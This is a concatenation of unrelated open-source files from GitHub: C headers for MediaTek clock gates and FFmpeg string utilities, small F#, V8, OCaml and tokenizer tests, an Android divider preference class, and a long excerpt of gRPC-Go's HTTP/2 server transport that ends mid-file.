#ifndef __DRV_CLK_GATE_H
#define __DRV_CLK_GATE_H
#include <linux/regmap.h>
#include <linux/clk-provider.h>
struct clk;
/*
 * struct mtk_clk_gate - MediaTek clock gate description
 * @hw:      clk_hw handle for the common clock framework
 * @regmap:  regmap used to access the gate registers
 * @set_ofs: register offset of the "set" register
 * @clr_ofs: register offset of the "clear" register
 * @sta_ofs: register offset of the status register
 * @bit:     bit position controlling this gate
 */
struct mtk_clk_gate {
	struct clk_hw hw;
	struct regmap *regmap;
	int set_ofs;
	int clr_ofs;
	int sta_ofs;
	u8 bit;
};

/* Convert a clk_hw pointer back to its enclosing mtk_clk_gate. */
static inline struct mtk_clk_gate *to_mtk_clk_gate(struct clk_hw *hw)
{
	return container_of(hw, struct mtk_clk_gate, hw);
}
extern const struct clk_ops mtk_clk_gate_ops_setclr;
extern const struct clk_ops mtk_clk_gate_ops_setclr_inv;
extern const struct clk_ops mtk_clk_gate_ops_no_setclr;
extern const struct clk_ops mtk_clk_gate_ops_no_setclr_inv;
struct clk *mtk_clk_register_gate(
const char *name,
const char *parent_name,
struct regmap *regmap,
int set_ofs,
int clr_ofs,
int sta_ofs,
u8 bit,
const struct clk_ops *ops);
#endif /* __DRV_CLK_GATE_H */
| {
"pile_set_name": "Github"
} |
<view class="container">
<view class="textContainer">
<text class="textStyle">{{text}}</text>
</view>
</view> | {
"pile_set_name": "Github"
} |
// #Conformance #TypesAndModules #Records
#light
// Verify the ability to clone records using a simplified syntax
// Record with an optional, recursive field so cloning can nest instances.
type RecType = { A : int; B : string; C : float; D : RecType option }

let t1 = { A = 1; B = "t1"; C = 3.14; D = None }
// Copy-and-update expressions: fields not named after 'with' are cloned
// from the source record.
let t2 = { t1 with A = 2 }
let t3 = { t2 with B = "t3" }
let t4 = { t3 with C = 4.4; D = Some(t1) }

// Changed field
if t1.A <> 1 || t2.A <> 2 then exit 1
// The rest were cloned from t1
if t1.B <> t2.B || t1.C <> t2.C || t1.D <> t2.D then exit 1

if t3.B <> "t3" then exit 1
// The rest were cloned from t2
if t3.A <> t2.A || t3.C <> t2.C || t3.D <> t2.D then exit 1

if t4.C <> 4.4 || t4.D <> Some(t1) then exit 1
if t4.A <> t3.A || t4.B <> t3.B then exit 1

// Exit code 0 signals the test harness that every check passed.
exit 0
| {
"pile_set_name": "Github"
} |
''
'foo'
'foo\'bar'
``
`foo`
`foo\`bar`
----------------------------------------------------
[
["string", "''"],
["string", "'foo'"],
["string", "'foo\\'bar'"],
["string", "``"],
["string", "`foo`"],
["string", "`foo\\`bar`"]
]
----------------------------------------------------
Checks for strings. | {
"pile_set_name": "Github"
} |
// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// Regression test: a block-level function declaration introduced via eval
// inside a `with` scope.
// NOTE(review): presumably relies on sloppy-mode (Annex B) hoisting of `f`
// out of the block so the top-level call succeeds — confirm intended
// semantics against the V8 issue this test was added for.
with({}) { eval("{function f(){f}}") };
f()
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2007 Mans Rullgard
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#ifndef AVUTIL_AVSTRING_H
#define AVUTIL_AVSTRING_H
#include <stddef.h>
/**
* Return non-zero if pfx is a prefix of str. If it is, *ptr is set to
* the address of the first character in str after the prefix.
*
* @param str input string
* @param pfx prefix to test
* @param ptr updated if the prefix is matched inside str
* @return non-zero if the prefix matches, zero otherwise
*/
int av_strstart(const char *str, const char *pfx, const char **ptr);
/**
* Return non-zero if pfx is a prefix of str independent of case. If
* it is, *ptr is set to the address of the first character in str
* after the prefix.
*
* @param str input string
* @param pfx prefix to test
* @param ptr updated if the prefix is matched inside str
* @return non-zero if the prefix matches, zero otherwise
*/
int av_stristart(const char *str, const char *pfx, const char **ptr);
/**
* Locate the first case-independent occurrence in the string haystack
* of the string needle. A zero-length string needle is considered to
* match at the start of haystack.
*
* This function is a case-insensitive version of the standard strstr().
*
* @param haystack string to search in
* @param needle string to search for
* @return pointer to the located match within haystack
* or a null pointer if no match
*/
char *av_stristr(const char *haystack, const char *needle);
/**
* Copy the string src to dst, but no more than size - 1 bytes, and
* null-terminate dst.
*
* This function is the same as BSD strlcpy().
*
* @param dst destination buffer
* @param src source string
* @param size size of destination buffer
* @return the length of src
*
* WARNING: since the return value is the length of src, src absolutely
* _must_ be a properly 0-terminated string, otherwise this will read beyond
* the end of the buffer and possibly crash.
*/
size_t av_strlcpy(char *dst, const char *src, size_t size);
/**
* Append the string src to the string dst, but to a total length of
* no more than size - 1 bytes, and null-terminate dst.
*
* This function is similar to BSD strlcat(), but differs when
* size <= strlen(dst).
*
* @param dst destination buffer
* @param src source string
* @param size size of destination buffer
* @return the total length of src and dst
*
* WARNING: since the return value use the length of src and dst, these absolutely
* _must_ be a properly 0-terminated strings, otherwise this will read beyond
* the end of the buffer and possibly crash.
*/
size_t av_strlcat(char *dst, const char *src, size_t size);
/**
* Append output to a string, according to a format. Never write out of
* the destination buffer, and always put a terminating 0 within
* the buffer.
* @param dst destination buffer (string to which the output is
* appended)
* @param size total size of the destination buffer
* @param fmt printf-compatible format string, specifying how the
* following parameters are used
* @return the length of the string that would have been generated
* if enough space had been available
*/
size_t av_strlcatf(char *dst, size_t size, const char *fmt, ...);
/**
 * Convert a number to an av_malloc()ed string.
 * The caller is responsible for freeing the returned string
 * (presumably with av_free() — confirm against libavutil conventions).
 */
char *av_d2str(double d);
#endif /* AVUTIL_AVSTRING_H */
| {
"pile_set_name": "Github"
} |
(** example.ml: The first special comment of the file is the comment
associated with the whole module. *)
(** Comment for exception My_exception. *)
exception My_exception of (int -> int) * int
(** Comment for type [weather] *)
type weather =
| Rain of int (** The comment for construtor Rain *)
| Sun (** The comment for constructor Sun *)
(** Find the current weather for a country
    @author Anil Madhavapeddy
    @param location The country to get the weather for.
  *)
let what_is_the_weather_in = function
  | `Cambridge  -> Rain 100
  | `New_york   -> Rain 20
  | `California -> Sun
| {
"pile_set_name": "Github"
} |
package com.fanchen.imovie.view.preference;
import android.content.Context;
import android.preference.Preference;
import android.util.AttributeSet;
import android.util.TypedValue;
import android.view.View;
import android.view.ViewGroup;
import android.widget.LinearLayout;
import com.fanchen.imovie.R;
import com.fanchen.imovie.util.DisplayUtil;
/**
* Created by fanchen on 2017/7/26.
*/
/**
 * Preference that renders only a thin horizontal divider line, tinted with
 * the theme's primary color, for visually separating preference groups.
 */
public class PreferenceLine extends Preference{

    public PreferenceLine(Context context, AttributeSet attrs) {
        super(context, attrs);
    }

    public PreferenceLine(Context context, AttributeSet attrs, int defStyleAttr) {
        super(context, attrs, defStyleAttr);
    }

    public PreferenceLine(Context context) {
        super(context);
    }

    @Override
    protected View onCreateView(ViewGroup parent) {
        // NOTE(review): the default view built by super is discarded;
        // presumably intentional since this preference draws its own row —
        // confirm no side effects of super.onCreateView are relied upon.
        super.onCreateView(parent);
        LinearLayout linearLayout = new LinearLayout(getContext());
        ViewGroup.LayoutParams layoutParams = new ViewGroup.LayoutParams(ViewGroup.LayoutParams.MATCH_PARENT,ViewGroup.LayoutParams.WRAP_CONTENT);
        linearLayout.setLayoutParams(layoutParams);
        View view = new View(parent.getContext());
        // Resolve the theme's colorPrimary attribute to tint the divider.
        TypedValue typedValue = new TypedValue();
        getContext().getTheme().resolveAttribute(R.attr.colorPrimary, typedValue, true);
        view.setBackgroundColor(typedValue.data);
        // 0.5dp-tall line with a 5dp top margin and 10dp side margins.
        LinearLayout.LayoutParams params = new LinearLayout.LayoutParams(ViewGroup.LayoutParams.MATCH_PARENT, DisplayUtil.dip2px(getContext(),0.5f));
        int dp5 = DisplayUtil.dip2px(getContext(), 5);
        int dp10 = DisplayUtil.dip2px(getContext(), 10);
        params.topMargin = dp5;
        params.leftMargin = dp10;
        params.rightMargin = dp10;
        view.setLayoutParams(params);
        linearLayout.addView(view);
        return linearLayout;
    }
}
| {
"pile_set_name": "Github"
} |
/*
*
* Copyright 2014 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package transport
import (
"bytes"
"context"
"errors"
"fmt"
"io"
"math"
"net"
"strconv"
"sync"
"sync/atomic"
"time"
"github.com/golang/protobuf/proto"
"golang.org/x/net/http2"
"golang.org/x/net/http2/hpack"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/credentials"
"google.golang.org/grpc/grpclog"
"google.golang.org/grpc/internal/channelz"
"google.golang.org/grpc/internal/grpcrand"
"google.golang.org/grpc/keepalive"
"google.golang.org/grpc/metadata"
"google.golang.org/grpc/peer"
"google.golang.org/grpc/stats"
"google.golang.org/grpc/status"
"google.golang.org/grpc/tap"
)
var (
// ErrIllegalHeaderWrite indicates that setting header is illegal because of
// the stream's state.
ErrIllegalHeaderWrite = errors.New("transport: the stream is done or WriteHeader was already called")
// ErrHeaderListSizeLimitViolation indicates that the header list size is larger
// than the limit set by peer.
ErrHeaderListSizeLimitViolation = errors.New("transport: trying to send header list size larger than the limit set by peer")
)
// http2Server implements the ServerTransport interface with HTTP2.
type http2Server struct {
ctx context.Context
ctxDone <-chan struct{} // Cache the context.Done() chan
cancel context.CancelFunc
conn net.Conn
loopy *loopyWriter
readerDone chan struct{} // sync point to enable testing.
writerDone chan struct{} // sync point to enable testing.
remoteAddr net.Addr
localAddr net.Addr
maxStreamID uint32 // max stream ID ever seen
authInfo credentials.AuthInfo // auth info about the connection
inTapHandle tap.ServerInHandle
framer *framer
// The max number of concurrent streams.
maxStreams uint32
// controlBuf delivers all the control related tasks (e.g., window
// updates, reset streams, and various settings) to the controller.
controlBuf *controlBuffer
fc *trInFlow
stats stats.Handler
// Flag to keep track of reading activity on transport.
// 1 is true and 0 is false.
activity uint32 // Accessed atomically.
// Keepalive and max-age parameters for the server.
kp keepalive.ServerParameters
// Keepalive enforcement policy.
kep keepalive.EnforcementPolicy
// The time instance last ping was received.
lastPingAt time.Time
// Number of times the client has violated keepalive ping policy so far.
pingStrikes uint8
// Flag to signify that number of ping strikes should be reset to 0.
// This is set whenever data or header frames are sent.
// 1 means yes.
resetPingStrikes uint32 // Accessed atomically.
initialWindowSize int32
bdpEst *bdpEstimator
maxSendHeaderListSize *uint32
mu sync.Mutex // guard the following
// drainChan is initialized when drain(...) is called the first time.
// After which the server writes out the first GoAway(with ID 2^31-1) frame.
// Then an independent goroutine will be launched to later send the second GoAway.
// During this time we don't want to write another first GoAway(with ID 2^31 -1) frame.
// Thus call to drain(...) will be a no-op if drainChan is already initialized since draining is
// already underway.
drainChan chan struct{}
state transportState
activeStreams map[uint32]*Stream
// idle is the time instant when the connection went idle.
// This is either the beginning of the connection or when the number of
// RPCs go down to 0.
// When the connection is busy, this value is set to 0.
idle time.Time
// Fields below are for channelz metric collection.
channelzID int64 // channelz unique identification number
czData *channelzData
}
// newHTTP2Server constructs a ServerTransport based on HTTP2. ConnectionError is
// returned if something goes wrong.
func newHTTP2Server(conn net.Conn, config *ServerConfig) (_ ServerTransport, err error) {
writeBufSize := config.WriteBufferSize
readBufSize := config.ReadBufferSize
maxHeaderListSize := defaultServerMaxHeaderListSize
if config.MaxHeaderListSize != nil {
maxHeaderListSize = *config.MaxHeaderListSize
}
framer := newFramer(conn, writeBufSize, readBufSize, maxHeaderListSize)
// Send initial settings as connection preface to client.
var isettings []http2.Setting
// TODO(zhaoq): Have a better way to signal "no limit" because 0 is
// permitted in the HTTP2 spec.
maxStreams := config.MaxStreams
if maxStreams == 0 {
maxStreams = math.MaxUint32
} else {
isettings = append(isettings, http2.Setting{
ID: http2.SettingMaxConcurrentStreams,
Val: maxStreams,
})
}
dynamicWindow := true
iwz := int32(initialWindowSize)
if config.InitialWindowSize >= defaultWindowSize {
iwz = config.InitialWindowSize
dynamicWindow = false
}
icwz := int32(initialWindowSize)
if config.InitialConnWindowSize >= defaultWindowSize {
icwz = config.InitialConnWindowSize
dynamicWindow = false
}
if iwz != defaultWindowSize {
isettings = append(isettings, http2.Setting{
ID: http2.SettingInitialWindowSize,
Val: uint32(iwz)})
}
if config.MaxHeaderListSize != nil {
isettings = append(isettings, http2.Setting{
ID: http2.SettingMaxHeaderListSize,
Val: *config.MaxHeaderListSize,
})
}
if err := framer.fr.WriteSettings(isettings...); err != nil {
return nil, connectionErrorf(false, err, "transport: %v", err)
}
// Adjust the connection flow control window if needed.
if delta := uint32(icwz - defaultWindowSize); delta > 0 {
if err := framer.fr.WriteWindowUpdate(0, delta); err != nil {
return nil, connectionErrorf(false, err, "transport: %v", err)
}
}
kp := config.KeepaliveParams
if kp.MaxConnectionIdle == 0 {
kp.MaxConnectionIdle = defaultMaxConnectionIdle
}
if kp.MaxConnectionAge == 0 {
kp.MaxConnectionAge = defaultMaxConnectionAge
}
// Add a jitter to MaxConnectionAge.
kp.MaxConnectionAge += getJitter(kp.MaxConnectionAge)
if kp.MaxConnectionAgeGrace == 0 {
kp.MaxConnectionAgeGrace = defaultMaxConnectionAgeGrace
}
if kp.Time == 0 {
kp.Time = defaultServerKeepaliveTime
}
if kp.Timeout == 0 {
kp.Timeout = defaultServerKeepaliveTimeout
}
kep := config.KeepalivePolicy
if kep.MinTime == 0 {
kep.MinTime = defaultKeepalivePolicyMinTime
}
ctx, cancel := context.WithCancel(context.Background())
t := &http2Server{
ctx: ctx,
cancel: cancel,
ctxDone: ctx.Done(),
conn: conn,
remoteAddr: conn.RemoteAddr(),
localAddr: conn.LocalAddr(),
authInfo: config.AuthInfo,
framer: framer,
readerDone: make(chan struct{}),
writerDone: make(chan struct{}),
maxStreams: maxStreams,
inTapHandle: config.InTapHandle,
fc: &trInFlow{limit: uint32(icwz)},
state: reachable,
activeStreams: make(map[uint32]*Stream),
stats: config.StatsHandler,
kp: kp,
idle: time.Now(),
kep: kep,
initialWindowSize: iwz,
czData: new(channelzData),
}
t.controlBuf = newControlBuffer(t.ctxDone)
if dynamicWindow {
t.bdpEst = &bdpEstimator{
bdp: initialWindowSize,
updateFlowControl: t.updateFlowControl,
}
}
if t.stats != nil {
t.ctx = t.stats.TagConn(t.ctx, &stats.ConnTagInfo{
RemoteAddr: t.remoteAddr,
LocalAddr: t.localAddr,
})
connBegin := &stats.ConnBegin{}
t.stats.HandleConn(t.ctx, connBegin)
}
if channelz.IsOn() {
t.channelzID = channelz.RegisterNormalSocket(t, config.ChannelzParentID, fmt.Sprintf("%s -> %s", t.remoteAddr, t.localAddr))
}
t.framer.writer.Flush()
defer func() {
if err != nil {
t.Close()
}
}()
// Check the validity of client preface.
preface := make([]byte, len(clientPreface))
if _, err := io.ReadFull(t.conn, preface); err != nil {
return nil, connectionErrorf(false, err, "transport: http2Server.HandleStreams failed to receive the preface from client: %v", err)
}
if !bytes.Equal(preface, clientPreface) {
return nil, connectionErrorf(false, nil, "transport: http2Server.HandleStreams received bogus greeting from client: %q", preface)
}
frame, err := t.framer.fr.ReadFrame()
if err == io.EOF || err == io.ErrUnexpectedEOF {
return nil, err
}
if err != nil {
return nil, connectionErrorf(false, err, "transport: http2Server.HandleStreams failed to read initial settings frame: %v", err)
}
atomic.StoreUint32(&t.activity, 1)
sf, ok := frame.(*http2.SettingsFrame)
if !ok {
return nil, connectionErrorf(false, nil, "transport: http2Server.HandleStreams saw invalid preface type %T from client", frame)
}
t.handleSettings(sf)
go func() {
t.loopy = newLoopyWriter(serverSide, t.framer, t.controlBuf, t.bdpEst)
t.loopy.ssGoAwayHandler = t.outgoingGoAwayHandler
if err := t.loopy.run(); err != nil {
errorf("transport: loopyWriter.run returning. Err: %v", err)
}
t.conn.Close()
close(t.writerDone)
}()
go t.keepalive()
return t, nil
}
// operateHeader takes action on the decoded headers.
func (t *http2Server) operateHeaders(frame *http2.MetaHeadersFrame, handle func(*Stream), traceCtx func(context.Context, string) context.Context) (fatal bool) {
streamID := frame.Header().StreamID
state := &decodeState{
serverSide: true,
}
if err := state.decodeHeader(frame); err != nil {
if se, ok := status.FromError(err); ok {
t.controlBuf.put(&cleanupStream{
streamID: streamID,
rst: true,
rstCode: statusCodeConvTab[se.Code()],
onWrite: func() {},
})
}
return false
}
buf := newRecvBuffer()
s := &Stream{
id: streamID,
st: t,
buf: buf,
fc: &inFlow{limit: uint32(t.initialWindowSize)},
recvCompress: state.data.encoding,
method: state.data.method,
contentSubtype: state.data.contentSubtype,
}
if frame.StreamEnded() {
// s is just created by the caller. No lock needed.
s.state = streamReadDone
}
if state.data.timeoutSet {
s.ctx, s.cancel = context.WithTimeout(t.ctx, state.data.timeout)
} else {
s.ctx, s.cancel = context.WithCancel(t.ctx)
}
pr := &peer.Peer{
Addr: t.remoteAddr,
}
// Attach Auth info if there is any.
if t.authInfo != nil {
pr.AuthInfo = t.authInfo
}
s.ctx = peer.NewContext(s.ctx, pr)
// Attach the received metadata to the context.
if len(state.data.mdata) > 0 {
s.ctx = metadata.NewIncomingContext(s.ctx, state.data.mdata)
}
if state.data.statsTags != nil {
s.ctx = stats.SetIncomingTags(s.ctx, state.data.statsTags)
}
if state.data.statsTrace != nil {
s.ctx = stats.SetIncomingTrace(s.ctx, state.data.statsTrace)
}
if t.inTapHandle != nil {
var err error
info := &tap.Info{
FullMethodName: state.data.method,
}
s.ctx, err = t.inTapHandle(s.ctx, info)
if err != nil {
warningf("transport: http2Server.operateHeaders got an error from InTapHandle: %v", err)
t.controlBuf.put(&cleanupStream{
streamID: s.id,
rst: true,
rstCode: http2.ErrCodeRefusedStream,
onWrite: func() {},
})
return false
}
}
t.mu.Lock()
if t.state != reachable {
t.mu.Unlock()
return false
}
if uint32(len(t.activeStreams)) >= t.maxStreams {
t.mu.Unlock()
t.controlBuf.put(&cleanupStream{
streamID: streamID,
rst: true,
rstCode: http2.ErrCodeRefusedStream,
onWrite: func() {},
})
return false
}
if streamID%2 != 1 || streamID <= t.maxStreamID {
t.mu.Unlock()
// illegal gRPC stream id.
errorf("transport: http2Server.HandleStreams received an illegal stream id: %v", streamID)
return true
}
t.maxStreamID = streamID
t.activeStreams[streamID] = s
if len(t.activeStreams) == 1 {
t.idle = time.Time{}
}
t.mu.Unlock()
if channelz.IsOn() {
atomic.AddInt64(&t.czData.streamsStarted, 1)
atomic.StoreInt64(&t.czData.lastStreamCreatedTime, time.Now().UnixNano())
}
s.requestRead = func(n int) {
t.adjustWindow(s, uint32(n))
}
s.ctx = traceCtx(s.ctx, s.method)
if t.stats != nil {
s.ctx = t.stats.TagRPC(s.ctx, &stats.RPCTagInfo{FullMethodName: s.method})
inHeader := &stats.InHeader{
FullMethod: s.method,
RemoteAddr: t.remoteAddr,
LocalAddr: t.localAddr,
Compression: s.recvCompress,
WireLength: int(frame.Header().Length),
}
t.stats.HandleRPC(s.ctx, inHeader)
}
s.ctxDone = s.ctx.Done()
s.wq = newWriteQuota(defaultWriteQuota, s.ctxDone)
s.trReader = &transportReader{
reader: &recvBufferReader{
ctx: s.ctx,
ctxDone: s.ctxDone,
recv: s.buf,
},
windowHandler: func(n int) {
t.updateWindow(s, uint32(n))
},
}
// Register the stream with loopy.
t.controlBuf.put(®isterStream{
streamID: s.id,
wq: s.wq,
})
handle(s)
return false
}
// HandleStreams receives incoming streams using the given handler. This is
// typically run in a separate goroutine.
// traceCtx attaches trace to ctx and returns the new context.
func (t *http2Server) HandleStreams(handle func(*Stream), traceCtx func(context.Context, string) context.Context) {
defer close(t.readerDone)
for {
frame, err := t.framer.fr.ReadFrame()
atomic.StoreUint32(&t.activity, 1)
if err != nil {
if se, ok := err.(http2.StreamError); ok {
warningf("transport: http2Server.HandleStreams encountered http2.StreamError: %v", se)
t.mu.Lock()
s := t.activeStreams[se.StreamID]
t.mu.Unlock()
if s != nil {
t.closeStream(s, true, se.Code, false)
} else {
t.controlBuf.put(&cleanupStream{
streamID: se.StreamID,
rst: true,
rstCode: se.Code,
onWrite: func() {},
})
}
continue
}
if err == io.EOF || err == io.ErrUnexpectedEOF {
t.Close()
return
}
warningf("transport: http2Server.HandleStreams failed to read frame: %v", err)
t.Close()
return
}
switch frame := frame.(type) {
case *http2.MetaHeadersFrame:
if t.operateHeaders(frame, handle, traceCtx) {
t.Close()
break
}
case *http2.DataFrame:
t.handleData(frame)
case *http2.RSTStreamFrame:
t.handleRSTStream(frame)
case *http2.SettingsFrame:
t.handleSettings(frame)
case *http2.PingFrame:
t.handlePing(frame)
case *http2.WindowUpdateFrame:
t.handleWindowUpdate(frame)
case *http2.GoAwayFrame:
// TODO: Handle GoAway from the client appropriately.
default:
errorf("transport: http2Server.HandleStreams found unhandled frame type %v.", frame)
}
}
}
// getStream looks up the active stream addressed by the frame's stream ID.
// It returns false if the transport is closing or the stream is already done.
func (t *http2Server) getStream(f http2.Frame) (*Stream, bool) {
	t.mu.Lock()
	defer t.mu.Unlock()
	if t.activeStreams == nil {
		// The transport is closing.
		return nil, false
	}
	if s, ok := t.activeStreams[f.Header().StreamID]; ok {
		return s, true
	}
	// The stream is already done.
	return nil, false
}
// adjustWindow sends out extra window update over the initial window size
// of stream if the application is requesting data larger in size than
// the window.
func (t *http2Server) adjustWindow(s *Stream, n uint32) {
	// maybeAdjust returns a non-zero increment only when extra quota is needed.
	if w := s.fc.maybeAdjust(n); w > 0 {
		t.controlBuf.put(&outgoingWindowUpdate{streamID: s.id, increment: w})
	}
}
// updateWindow adjusts the inbound quota for the stream and the transport.
// Window updates will deliver to the controller for sending when
// the cumulative quota exceeds the corresponding threshold.
func (t *http2Server) updateWindow(s *Stream, n uint32) {
	// onRead accumulates consumed bytes and returns a non-zero increment
	// only once the update threshold is crossed.
	if w := s.fc.onRead(n); w > 0 {
		t.controlBuf.put(&outgoingWindowUpdate{streamID: s.id,
			increment: w,
		})
	}
}
// updateFlowControl updates the incoming flow control windows
// for the transport and the stream based on the current bdp
// estimation.
func (t *http2Server) updateFlowControl(n uint32) {
	// Raise the limit on every active stream and remember it for new streams.
	t.mu.Lock()
	for _, s := range t.activeStreams {
		s.fc.newLimit(n)
	}
	t.initialWindowSize = int32(n)
	t.mu.Unlock()
	// Grow the connection-level window by the delta returned by newLimit.
	t.controlBuf.put(&outgoingWindowUpdate{
		streamID: 0,
		increment: t.fc.newLimit(n),
	})
	// Advertise the new per-stream initial window size to the peer.
	t.controlBuf.put(&outgoingSettings{
		ss: []http2.Setting{
			{
				ID:  http2.SettingInitialWindowSize,
				Val: n,
			},
		},
	})
}
// handleData dispatches a peer DATA frame: it replenishes connection-level
// flow control, optionally schedules a BDP ping, copies the payload into
// the stream's receive buffer, and signals EOF on client half-close.
func (t *http2Server) handleData(f *http2.DataFrame) {
	size := f.Header().Length
	var sendBDPPing bool
	if t.bdpEst != nil {
		sendBDPPing = t.bdpEst.add(size)
	}
	// Decouple connection's flow control from application's read.
	// An update on connection's flow control should not depend on
	// whether user application has read the data or not. Such a
	// restriction is already imposed on the stream's flow control,
	// and therefore the sender will be blocked anyways.
	// Decoupling the connection flow control will prevent other
	// active(fast) streams from starving in presence of slow or
	// inactive streams.
	if w := t.fc.onData(size); w > 0 {
		t.controlBuf.put(&outgoingWindowUpdate{
			streamID:  0,
			increment: w,
		})
	}
	if sendBDPPing {
		// Avoid excessive ping detection (e.g. in an L7 proxy)
		// by sending a window update prior to the BDP ping.
		if w := t.fc.reset(); w > 0 {
			t.controlBuf.put(&outgoingWindowUpdate{
				streamID:  0,
				increment: w,
			})
		}
		t.controlBuf.put(bdpPing)
	}
	// Select the right stream to dispatch.
	s, ok := t.getStream(f)
	if !ok {
		return
	}
	if size > 0 {
		if err := s.fc.onData(size); err != nil {
			// The peer overran the stream-level window: reset the stream.
			t.closeStream(s, true, http2.ErrCodeFlowControl, false)
			return
		}
		if f.Header().Flags.Has(http2.FlagDataPadded) {
			// Return padding bytes (frame length minus payload) to the window.
			if w := s.fc.onRead(size - uint32(len(f.Data()))); w > 0 {
				t.controlBuf.put(&outgoingWindowUpdate{s.id, w})
			}
		}
		// TODO(bradfitz, zhaoq): A copy is required here because there is no
		// guarantee f.Data() is consumed before the arrival of next frame.
		// Can this copy be eliminated?
		if len(f.Data()) > 0 {
			data := make([]byte, len(f.Data()))
			copy(data, f.Data())
			s.write(recvMsg{data: data})
		}
	}
	if f.Header().Flags.Has(http2.FlagDataEndStream) {
		// Received the end of stream from the client.
		s.compareAndSwapState(streamActive, streamReadDone)
		s.write(recvMsg{err: io.EOF})
	}
}
// handleRSTStream tears down the stream named by a peer RST_STREAM frame.
func (t *http2Server) handleRSTStream(f *http2.RSTStreamFrame) {
	s, ok := t.getStream(f)
	if !ok {
		// The stream is already gone from the active-streams map; still put a
		// cleanupStream item into controlbuf so the loopy writer deletes the
		// stream from its established-streams map.
		t.controlBuf.put(&cleanupStream{
			streamID: f.Header().StreamID,
			rst:      false,
			rstCode:  0,
			onWrite:  func() {},
		})
		return
	}
	// Stream still active: run the regular close path.
	t.closeStream(s, false, 0, false)
}
// handleSettings applies a peer SETTINGS frame: MaxHeaderListSize is
// captured locally, all other settings are forwarded to the loopy writer.
func (t *http2Server) handleSettings(f *http2.SettingsFrame) {
	if f.IsAck() {
		return
	}
	var ss []http2.Setting
	var updateFuncs []func()
	f.ForeachSetting(func(s http2.Setting) error {
		switch s.ID {
		case http2.SettingMaxHeaderListSize:
			// Deferred so the limit change is applied in controlBuf order.
			updateFuncs = append(updateFuncs, func() {
				t.maxSendHeaderListSize = new(uint32)
				*t.maxSendHeaderListSize = s.Val
			})
		default:
			ss = append(ss, s)
		}
		return nil
	})
	// Run the local updates and enqueue the remaining settings atomically.
	t.controlBuf.executeAndPut(func(interface{}) bool {
		for _, f := range updateFuncs {
			f()
		}
		return true
	}, &incomingSettings{
		ss: ss,
	})
}
const (
	// maxPingStrikes is the number of keepalive-policy violations tolerated
	// before the connection is closed with "too_many_pings".
	maxPingStrikes = 2
	// defaultPingTimeout bounds how often a client without active streams
	// (and without PermitWithoutStream) may ping before accruing strikes.
	defaultPingTimeout = 2 * time.Hour
)
// handlePing answers peer PING frames and enforces the keepalive ping
// policy: clients pinging too often accumulate "strikes"; too many strikes
// close the connection with ENHANCE_YOUR_CALM ("too_many_pings").
func (t *http2Server) handlePing(f *http2.PingFrame) {
	if f.IsAck() {
		if f.Data == goAwayPing.data && t.drainChan != nil {
			// Ack of the ping sent with the first GoAway: continue draining.
			close(t.drainChan)
			return
		}
		// Maybe it's a BDP ping.
		if t.bdpEst != nil {
			t.bdpEst.calculate(f.Data)
		}
		return
	}
	// Echo the ping payload back as an ack.
	pingAck := &ping{ack: true}
	copy(pingAck.data[:], f.Data[:])
	t.controlBuf.put(pingAck)

	now := time.Now()
	defer func() {
		t.lastPingAt = now
	}()
	// A reset ping strikes means that we don't need to check for policy
	// violation for this ping and the pingStrikes counter should be set
	// to 0.
	if atomic.CompareAndSwapUint32(&t.resetPingStrikes, 1, 0) {
		t.pingStrikes = 0
		return
	}
	t.mu.Lock()
	ns := len(t.activeStreams)
	t.mu.Unlock()
	if ns < 1 && !t.kep.PermitWithoutStream {
		// Keepalive shouldn't be active thus, this new ping should
		// have come after at least defaultPingTimeout.
		if t.lastPingAt.Add(defaultPingTimeout).After(now) {
			t.pingStrikes++
		}
	} else {
		// Check if keepalive policy is respected.
		if t.lastPingAt.Add(t.kep.MinTime).After(now) {
			t.pingStrikes++
		}
	}

	if t.pingStrikes > maxPingStrikes {
		// Send goaway and close the connection.
		errorf("transport: Got too many pings from the client, closing the connection.")
		t.controlBuf.put(&goAway{code: http2.ErrCodeEnhanceYourCalm, debugData: []byte("too_many_pings"), closeConn: true})
	}
}
// handleWindowUpdate forwards a peer WINDOW_UPDATE frame to the loopy writer.
func (t *http2Server) handleWindowUpdate(f *http2.WindowUpdateFrame) {
	update := &incomingWindowUpdate{
		streamID:  f.Header().StreamID,
		increment: f.Increment,
	}
	t.controlBuf.put(update)
}
// appendHeaderFieldsFromMD converts user metadata into hpack header fields,
// appending them to headerFields and returning the extended slice.
func appendHeaderFieldsFromMD(headerFields []hpack.HeaderField, md metadata.MD) []hpack.HeaderField {
	for k, vv := range md {
		if isReservedHeader(k) {
			// Clients don't tolerate reading restricted headers after some non restricted ones were sent.
			continue
		}
		for _, v := range vv {
			hf := hpack.HeaderField{Name: k, Value: encodeMetadataHeader(k, v)}
			headerFields = append(headerFields, hf)
		}
	}
	return headerFields
}
// checkForHeaderListSize reports whether the headerFrame in it fits within
// the header-list-size limit advertised by the client (if any).
func (t *http2Server) checkForHeaderListSize(it interface{}) bool {
	limit := t.maxSendHeaderListSize
	if limit == nil {
		// Client never advertised a limit.
		return true
	}
	hdrFrame := it.(*headerFrame)
	var total int64
	for _, f := range hdrFrame.hf {
		total += int64(f.Size())
		if total > int64(*limit) {
			errorf("header list size to send violates the maximum size (%d bytes) set by client", *limit)
			return false
		}
	}
	return true
}
// WriteHeader sends the header metadata md back to the client.
// It fails with ErrIllegalHeaderWrite if headers were already sent or the
// stream is done; md is merged into any header metadata set earlier on s.
